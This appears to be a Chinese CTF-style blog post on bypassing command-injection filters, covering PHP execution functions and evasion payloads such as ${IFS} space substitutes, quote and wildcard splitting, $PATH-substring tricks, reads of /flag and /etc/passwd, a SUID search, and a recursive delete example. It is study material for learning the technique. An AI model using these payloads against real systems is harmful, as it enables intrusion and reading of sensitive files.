

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/imags/world.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="everythingis-ok">
  <meta name="keywords" content="">
  
    <meta name="description" content="RCE（任意命令执行）绕过操作系统连接符分号；：多个命令无论对错顺序执行 &amp;&amp;：前面命令执行不成功后面命令无法执行 &amp;：用于依次执行多个命令，无论前一个命令是否成功。 管道输出符|：前面命令的输出作为后面命令的输入，把前面命令的结果作为后面命令的参数;前面后面的命令都执行，但是只显示后面的命令执行结果。 ||：前面的命令执行成功，则后面的命令不会执行；前面的命令执行失败，则">
<meta property="og:type" content="article">
<meta property="og:title" content="RCE（任意命令执行）绕过">
<meta property="og:url" content="http://example.com/2025/04/06/RCE%EF%BC%88%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%89%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="haomeng&#39;s blog^^">
<meta property="og:description" content="RCE（任意命令执行）绕过操作系统连接符分号；：多个命令无论对错顺序执行 &amp;&amp;：前面命令执行不成功后面命令无法执行 &amp;：用于依次执行多个命令，无论前一个命令是否成功。 管道输出符|：前面命令的输出作为后面命令的输入，把前面命令的结果作为后面命令的参数;前面后面的命令都执行，但是只显示后面的命令执行结果。 ||：前面的命令执行成功，则后面的命令不会执行；前面的命令执行失败，则">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/everythingis-ok/inage/PixPin_2025-03-24_21-34-22.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/everythingis-ok/inage/PixPin_2025-03-24_21-38-16.png">
<meta property="article:published_time" content="2025-04-06T14:56:25.000Z">
<meta property="article:modified_time" content="2025-04-07T10:44:17.871Z">
<meta property="article:author" content="everythingis-ok">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/everythingis-ok/inage/PixPin_2025-03-24_21-34-22.png">
  
  
  
  <title>RCE（任意命令执行）绕过 - haomeng&#39;s blog^^</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>everythingis-ok</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/images/zi.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="RCE（任意命令执行）绕过"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-04-06 22:56" pubdate>
          2025年4月6日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          20 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">RCE（任意命令执行）绕过</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="RCE（任意命令执行）绕过"><a href="#RCE（任意命令执行）绕过" class="headerlink" title="RCE（任意命令执行）绕过"></a>RCE（任意命令执行）绕过</h1><h2 id="操作系统连接符"><a href="#操作系统连接符" class="headerlink" title="操作系统连接符"></a>操作系统连接符</h2><p>分号；：多个命令无论对错顺序执行</p>
<p>&amp;&amp;：前面命令执行不成功后面命令无法执行</p>
<p>&amp;：用于依次执行多个命令，无论前一个命令是否成功。</p>
<p>管道输出符|：前面命令的输出作为后面命令的输入，把前面命令的结果作为后面命令的参数;前面后面的命令都执行，但是只显示后面的命令执行结果。</p>
<p>||：前面的命令执行成功，则后面的命令不会执行；前面的命令执行失败，则后面的命令执行</p>
<h2 id="程序执行函数"><a href="#程序执行函数" class="headerlink" title="程序执行函数"></a>程序执行函数</h2><p>os.system()</p>
<p>subprocess.Popen()</p>
<h3 id="exec"><a href="#exec" class="headerlink" title="exec()"></a>exec()</h3><p><strong>示例exec(“cat &#x2F;flag”)</strong></p>
<p>exec(<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.types.string.php">string</a> <code>$command</code>, <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.types.array.php">array</a> <code>&amp;$output</code> &#x3D; <strong><code>null</code></strong>, <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.types.integer.php">int</a> <code>&amp;$result_code</code> &#x3D; <strong><code>null</code></strong>): <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.types.string.php">string</a>|<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.types.value.php">false</a></p>
<p>exec() 执行 <code>command</code> 参数所指定的命令。</p>
<p>如果提供了 <code>output</code> 参数， 那么会用命令执行的输出填充此数组， 每行输出填充数组中的一个元素。</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">exec</span>()` 函数用于执行 shell 命令，但不会直接输出执行结果，它的返回值只是命令的最后一行输出，而不是完整的输出。如果你需要完整的执行结果，可以使用 `<span class="hljs-built_in">exec</span>()` 的第二个参数或 `<span class="hljs-built_in">shell_exec</span>()<br></code></pre></td></tr></table></figure>



<p>返回值</p>
<p>命令执行结果的最后一行内容。</p>
<h3 id="shell-exec"><a href="#shell-exec" class="headerlink" title="shell_exec"></a>shell_exec</h3><p>shell_exec — 通过 shell 执行命令并将完整的输出以字符串的方式返回</p>
<p>示例：<strong>shell_exec（ls）</strong>  shell_exec(ls | tee 1.txt)</p>
<p>不能自己回显，需要print_r等输出内容</p>
<h3 id="system"><a href="#system" class="headerlink" title="system"></a>system</h3><p>执行外部程序，并且显示输出</p>
<p>示例：<strong>system（’ls’）</strong></p>
<h3 id="passthru"><a href="#passthru" class="headerlink" title="passthru"></a>passthru</h3><p>同 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.exec.php">exec()</a> 函数类似， <strong>passthru()</strong> 函数 也是用来执行外部命令的。 </p>
<p>想让 <code>passthru()</code> <strong>直接输出到网页，同时存入变量</strong>，可以用 <code>tee</code> 命令：</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf">passthru(<span class="hljs-string">&quot;ls | tee temp.txt&quot;</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>不能自己回显，需要print_r等输出内容</p>
<h3 id="backticks-反引号"><a href="#backticks-反引号" class="headerlink" title="backticks(反引号)"></a>backticks(反引号)</h3><p>和 <code>shell_exec()</code> 类似，返回完整的命令输出。</p>
<p>示例：’ls’ </p>
<p>不能自己回显，需要print_r等输出内容</p>
<h3 id="popen"><a href="#popen" class="headerlink" title="popen"></a>popen</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-variable">$handle</span> = popen(<span class="hljs-string">&quot;ls&quot;</span>, <span class="hljs-string">&quot;r&quot;</span>);| <span class="hljs-built_in">echo</span> stream_get_contents(<span class="hljs-variable">$handle</span>);<br></code></pre></td></tr></table></figure>

<p>不能自己回显，需要print_r等输出内容</p>
<h3 id="proc-open"><a href="#proc-open" class="headerlink" title="proc_open"></a>proc_open</h3><p>语法:</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">proc_open</span><span class="hljs-params">(<span class="hljs-variable">$command</span>,<span class="hljs-variable">$descriptorspec</span>,<span class="hljs-variable">$pipes</span>,<span class="hljs-variable">$cwd</span>,<span class="hljs-variable">$env</span> vars,<span class="hljs-variable">$options</span>)</span></span>,<br></code></pre></td></tr></table></figure>

<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gams"><span class="hljs-meta"><span class="hljs-keyword">$command</span>是要执行的命令。</span><br><span class="hljs-meta"><span class="hljs-keyword">$descriptorspec</span>是一个描述符规范数组，用于指定进程的输入、输出和错误的文件描述符。</span><br><span class="hljs-meta"><span class="hljs-keyword">$pipes</span>是一个引用变量，用于存储与进程相关的管道。</span><br><span class="hljs-meta"><span class="hljs-keyword">$cwd</span>（可选）是设置子进程的当前工作目录。</span><br><span class="hljs-meta"><span class="hljs-keyword">$env</span>（可选）是设置子进程的环境变量。</span><br><span class="hljs-meta"><span class="hljs-keyword">$other</span>_options（可选）是其他选项，如设置超时等。</span><br></code></pre></td></tr></table></figure>

<p><code>proc_open(&quot;ls&quot;)</code> <strong>不能直接输出命令执行结果</strong>，需要手动读取 <code>pipes[1]</code> 并 <code>echo</code> 逐行输出，使其<strong>达到 <code>system(&quot;ls&quot;)</code> 或 <code>passthru(&quot;ls&quot;)</code> 的效果</strong>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$descriptorspec</span> = [<br>    <span class="hljs-number">1</span> =&gt; [<span class="hljs-string">&quot;pipe&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>],  <span class="hljs-comment">// 标准输出（可读）</span><br>    <span class="hljs-number">2</span> =&gt; [<span class="hljs-string">&quot;pipe&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>]   <span class="hljs-comment">// 标准错误（可读）</span><br>];<br><br><span class="hljs-variable">$process</span> = <span class="hljs-title function_ invoke__">proc_open</span>(<span class="hljs-string">&quot;ls&quot;</span>, <span class="hljs-variable">$descriptorspec</span>, <span class="hljs-variable">$pipes</span>);<br><br><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_resource</span>(<span class="hljs-variable">$process</span>)) &#123;<br>    <span class="hljs-keyword">while</span> (!<span class="hljs-title function_ invoke__">feof</span>(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>])) &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">fgets</span>(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>]); <span class="hljs-comment">// 逐行读取并输出</span><br>        <span class="hljs-title function_ invoke__">flush</span>();<br>    &#125;<br><br>    <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>]);<br>    <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">2</span>]);<br>    <span class="hljs-title function_ invoke__">proc_close</span>(<span class="hljs-variable">$process</span>);<br><br>&#125;<br></code></pre></td></tr></table></figure>





<h3 id="取反"><a href="#取反" class="headerlink" title="~取反"></a>~取反</h3><p><img src="https://cdn.jsdelivr.net/gh/everythingis-ok/inage/PixPin_2025-03-24_21-34-22.png" srcset="/img/loading.gif" lazyload alt="PixPin_2025-03-24_21-34-22"></p>
<p><img src="https://cdn.jsdelivr.net/gh/everythingis-ok/inage/PixPin_2025-03-24_21-38-16.png" srcset="/img/loading.gif" lazyload alt="PixPin_2025-03-24_21-38-16"></p>
<h2 id="被过滤"><a href="#被过滤" class="headerlink" title="&#x2F; 被过滤"></a>&#x2F; 被过滤</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">ls</span>&#123;<span class="hljs-variable">$IFS</span>&#125;-al<br></code></pre></td></tr></table></figure>

<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-keyword">cd</span> <span class="hljs-string">..</span>%26%26 <span class="hljs-string">..</span>%26%26<span class="hljs-keyword">cd</span> <span class="hljs-string">..</span>&amp;&amp;<span class="hljs-keyword">pwd</span><br></code></pre></td></tr></table></figure>



<h2 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h2><h3 id="大括号-里无空格"><a href="#大括号-里无空格" class="headerlink" title="大括号{ }里无空格"></a>大括号{ }里无空格</h3><p>{cat,flag.php}</p>
<h3 id="IFS"><a href="#IFS" class="headerlink" title="$IFS"></a>$IFS</h3><p>$IFS$9  </p>
<p>${IFS} </p>
<h3 id="09绕过"><a href="#09绕过" class="headerlink" title="%09绕过"></a>%09绕过</h3><h3 id="重定向字符"><a href="#重定向字符" class="headerlink" title="重定向字符&lt;，&lt;&gt;"></a><a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E9%87%8D%E5%AE%9A%E5%90%91&spm=1001.2101.3001.7020">重定向</a>字符&lt;，&lt;&gt;</h3><ol>
<li><p>在某些环境下，<code>&lt;</code> 和 <code>&gt;</code> 可以在特定情况下充当空格的作用。例如：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span>&lt;flag<br></code></pre></td></tr></table></figure>


</li>
<li></li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">ls</span>&gt;<span class="hljs-variable">$&#123;PWD&#125;</span>/test<br></code></pre></td></tr></table></figure>

<p>等价于</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">ls</span> &gt; <span class="hljs-built_in">test</span><br></code></pre></td></tr></table></figure>





<h3 id="利用-echo-命令替换"><a href="#利用-echo-命令替换" class="headerlink" title="利用 $(echo) 命令替换"></a>利用 <code>$(echo)</code> 命令替换</h3><p><code>$(command)</code> 语法在 Bash 中会执行 <code>command</code> 并用其输出替换该语法。因此，可以用 <code>echo</code> 生成一个空格：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span>$(<span class="hljs-built_in">echo</span>)/etc/passwd<br></code></pre></td></tr></table></figure>



<h3 id="；"><a href="#；" class="headerlink" title="；"></a>；</h3><p>ls;cat flag</p>
<h2 id="文件名过滤绕过"><a href="#文件名过滤绕过" class="headerlink" title="文件名过滤绕过"></a>文件名过滤绕过</h2><h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><h3 id="通配符-绕过"><a href="#通配符-绕过" class="headerlink" title="通配符??,*绕过"></a>通配符??,*绕过</h3><blockquote>
<p>cat &#x2F;fl??</p>
</blockquote>
<blockquote>
<p>cat &#x2F;f* </p>
</blockquote>
<h3 id="单引号-‘-双引号-“”-反引号-绕过正则"><a href="#单引号-‘-双引号-“”-反引号-绕过正则" class="headerlink" title="单引号(‘)双引号(“”)反引号(&#96;&#96;)绕过正则"></a>单引号(‘)双引号(“”)反引号(&#96;&#96;)绕过正则</h3><blockquote>
<p>cat &#x2F;fl””ag</p>
</blockquote>
<blockquote>
<p>c””at &#x2F;e’t’c&#x2F;pas<code>s</code>wd </p>
</blockquote>
<p>外面包裹的是单引号里面就是双引号，外面包裹的是双引号里面就是单引号，或者用斜线\去掉功能性，避免报错</p>
<blockquote>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-function"><span class="hljs-title">passthru</span>(<span class="hljs-string">&#x27;cat /fl&quot;&quot;ag.p\&#x27;</span>\<span class="hljs-string">&#x27;hp&#x27;</span>)</span><br></code></pre></td></tr></table></figure>
</blockquote>
<h3 id="反斜杠-绕过"><a href="#反斜杠-绕过" class="headerlink" title="反斜杠\绕过"></a>反斜杠\绕过</h3><h3 id="位置参数特殊变量：-1到-9、-和"><a href="#位置参数特殊变量：-1到-9、-和" class="headerlink" title="位置参数特殊变量：$1到$9、$@和$*"></a>位置参数特殊变量：$1到$9、$@和$*</h3><p>或者在单词结尾处插入$x，这里的x可以是任意字母，例如可以写成如下形式：</p>
<blockquote>
<p>c$@at &#x2F;e$@tc&#x2F;pas$@swd</p>
<p>cat$x &#x2F;etc$x&#x2F;passwd$x</p>
<p>ca$@t &#x2F;etc$x&#x2F;passwd$x</p>
</blockquote>
<h3 id="内联执行绕过"><a href="#内联执行绕过" class="headerlink" title="内联执行绕过"></a>内联执行绕过</h3><p>a&#x3D;c;b&#x3D;a;c&#x3D;t;$a$b$c &#x2F;1.txt</p>
<p>a&#x3D;f;c&#x3D;a;d&#x3D;g;b&#x3D;l;cat $a$b$c$d.php（abcd拼接出来flag）</p>
<h3 id="利用linux中的环境变量"><a href="#利用linux中的环境变量" class="headerlink" title="利用linux中的环境变量"></a>利用linux中的环境变量</h3><p>使用环境变量里的字符执行变量</p>
<p>echo $PATH              #PATH默认系统环境变量</p>
<p>如果出现：</p>
<p>&#x2F;usr&#x2F;local&#x2F;sbin:&#x2F;usr&#x2F;local&#x2F;bin:&#x2F;usr&#x2F;sbin:&#x2F;usr&#x2F;bin:&#x2F;sbin:&#x2F;bin:&#x2F;usr&#x2F;games:&#x2F;usr&#x2F;local&#x2F;games:&#x2F;snap&#x2F;bin</p>
<p>echo f${PATH:5:1}${PATH:8:1}${PATH:66:1}.${PATH:93:1}h${PATH:93:1}<br>表示了flag.php</p>
<p>比如${PATH:5:1}指的是取路径的第五位（从0开始数，第0位是&#x2F;）的字符，步长为1，即只取一个字母l，以此类推就能拼接成关键字flag.php</p>
<h3 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h3><h2 id="读取命令绕过"><a href="#读取命令绕过" class="headerlink" title="读取命令绕过"></a>读取命令绕过</h2><h3 id="head"><a href="#head" class="headerlink" title="head"></a>head</h3><h3 id="使用-vi-vim-读取文件"><a href="#使用-vi-vim-读取文件" class="headerlink" title="使用 vi&#x2F;vim 读取文件"></a>使用 <code>vi</code>&#x2F;<code>vim</code> 读取文件</h3><figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sas">vi <span class="hljs-keyword">filename</span><br><br>vim <span class="hljs-keyword">filename</span><br></code></pre></td></tr></table></figure>

<p>或者以只读模式打开文件<br>可以用 <strong>view</strong>（Vim 内置的只读模式）：</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sas"><span class="hljs-keyword">view</span> <span class="hljs-keyword">filename</span><br>vim -R <span class="hljs-keyword">filename</span><br>//这样 vim 会以 只读模式 打开文件，防止误操作。<br></code></pre></td></tr></table></figure>




<h3 id="tac-反向显示，从最后一行开始往前显示"><a href="#tac-反向显示，从最后一行开始往前显示" class="headerlink" title="tac:反向显示，从最后一行开始往前显示"></a>tac:反向显示，从最后一行开始往前显示</h3><blockquote>
<p>tac &#x2F;flag</p>
</blockquote>
<h3 id="more-一页一页显示档案内容"><a href="#more-一页一页显示档案内容" class="headerlink" title="more:一页一页显示档案内容"></a>more:一页一页显示档案内容</h3><blockquote>
<p>more flag.php</p>
</blockquote>
<h3 id="less：与more类似"><a href="#less：与more类似" class="headerlink" title="less：与more类似"></a>less：与more类似</h3><h3 id="tail：查看末尾几行"><a href="#tail：查看末尾几行" class="headerlink" title="tail：查看末尾几行"></a>tail：查看末尾几行</h3><h3 id="nl：显示的时候，顺便输出行号"><a href="#nl：显示的时候，顺便输出行号" class="headerlink" title="nl：显示的时候，顺便输出行号"></a>nl：显示的时候，顺便输出行号</h3><blockquote>
<p>nl &#x2F;flag</p>
</blockquote>
<p>nl flag :当前目录下查找flag</p>
<h3 id="od：以二进制方式读取档案内容。正常的od-flag输出的纯纯二进制"><a href="#od：以二进制方式读取档案内容。正常的od-flag输出的纯纯二进制" class="headerlink" title="od：以二进制方式读取档案内容。正常的od &#x2F;flag输出的纯纯二进制"></a>od：以二进制方式读取档案内容。正常的od &#x2F;flag输出的纯纯二进制</h3><p>想看到文件内容需要：</p>
<p>passthru(“od -A d -c &#x2F;fla\g”);</p>
<h3 id="xxd：读取二进制文件"><a href="#xxd：读取二进制文件" class="headerlink" title="xxd：读取二进制文件"></a>xxd：读取二进制文件</h3><p>xxd &#x2F;flag</p>
<h3 id="sort：主要用于排序文件"><a href="#sort：主要用于排序文件" class="headerlink" title="sort：主要用于排序文件"></a>sort：主要用于排序文件</h3><p>so?t &#x2F;flag</p>
<h3 id="usr-bin-s-rt-flag"><a href="#usr-bin-s-rt-flag" class="headerlink" title="&#x2F;usr&#x2F;bin&#x2F;s?rt &#x2F;flag"></a>&#x2F;usr&#x2F;bin&#x2F;s?rt &#x2F;flag</h3><p>&#x2F;usr&#x2F;bin&#x2F;sort 和 sort 实际上是同一个命令。&#x2F;usr&#x2F;bin 目录是系统的标准目录之一，它包含了许多系统命令和工具的二进制文件，而 sort 命令通常就存放在 &#x2F;usr&#x2F;bin 目录中,因此&#x2F;usr&#x2F;bin&#x2F;sort &#x2F;flag 和 sort &#x2F;flag 是等价的。有时候sort不行可能&#x2F;usr&#x2F;bin&#x2F;s?rt可以</p>
<h3 id="uniq：报告或删除文件中重复的行，其实当成cat用就行"><a href="#uniq：报告或删除文件中重复的行，其实当成cat用就行" class="headerlink" title="uniq：报告或删除文件中重复的行，其实当成cat用就行"></a>uniq：报告或删除文件中重复的行，其实当成cat用就行</h3><h3 id="file-f-报错出具体内容"><a href="#file-f-报错出具体内容" class="headerlink" title="file -f:报错出具体内容"></a>file -f:报错出具体内容</h3><p>passthru(“file -f &#x2F;flag”);</p>
<h3 id="grep：在文本中查找指定字符串"><a href="#grep：在文本中查找指定字符串" class="headerlink" title="grep：在文本中查找指定字符串"></a>grep：在文本中查找指定字符串</h3><blockquote>
<p>passthru(“grep fla &#x2F;fla*”);</p>
</blockquote>
<h3 id="strings："><a href="#strings：" class="headerlink" title="strings："></a>strings：</h3><p>相当于cat</p>
<h3 id="无回显命令执行"><a href="#无回显命令执行" class="headerlink" title="无回显命令执行"></a>无回显命令执行</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">&gt;</span><span class="language-bash">1.txt</span><br></code></pre></td></tr></table></figure>

<p> 提权ls &#x2F;-al</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">find</span> / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/<span class="hljs-literal">null</span> &gt;1.txt<br></code></pre></td></tr></table></figure>

<h4 id="1-find"><a href="#1-find" class="headerlink" title="1. find /"></a><strong>1. <code>find /</code></strong></h4><ul>
<li><p><strong>作用</strong>：从根目录 <code>/</code> 开始递归搜索整个文件系统。</p>
</li>
<li><p>**为什么用 <code>/</code>**：表示搜索所有目录和子目录，确保不遗漏任何文件。</p>
<table>
<thead>
<tr>
<th align="left">功能</th>
<th align="left">示例</th>
</tr>
</thead>
<tbody><tr>
<td align="left">按文件名查找</td>
<td align="left"><code>find / -name &quot;flag*&quot;</code>(以flag开头的文件)</td>
</tr>
<tr>
<td align="left">按文件类型查找</td>
<td align="left"><code>find / -type f</code>（文件）或 <code>-type d</code>（目录）</td>
</tr>
<tr>
<td align="left">按文件大小查找</td>
<td align="left"><code>find / -size +10M</code>（大于10MB的文件）</td>
</tr>
<tr>
<td align="left">按修改时间查找</td>
<td align="left"><code>find / -mtime -7</code>（7天内修改过的文件）</td>
</tr>
<tr>
<td align="left">对找到的文件执行操作</td>
<td align="left"><code>find / -name &quot;*.log&quot; -exec rm &#123;&#125; \;</code>（删除所有.log文件）</td>
</tr>
</tbody></table>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-built_in">find</span> / -<span class="hljs-built_in">name</span> <span class="hljs-string">&quot;*flag*&quot;</span>  （文件名中含有<span class="hljs-built_in">flag</span>）<br></code></pre></td></tr></table></figure>

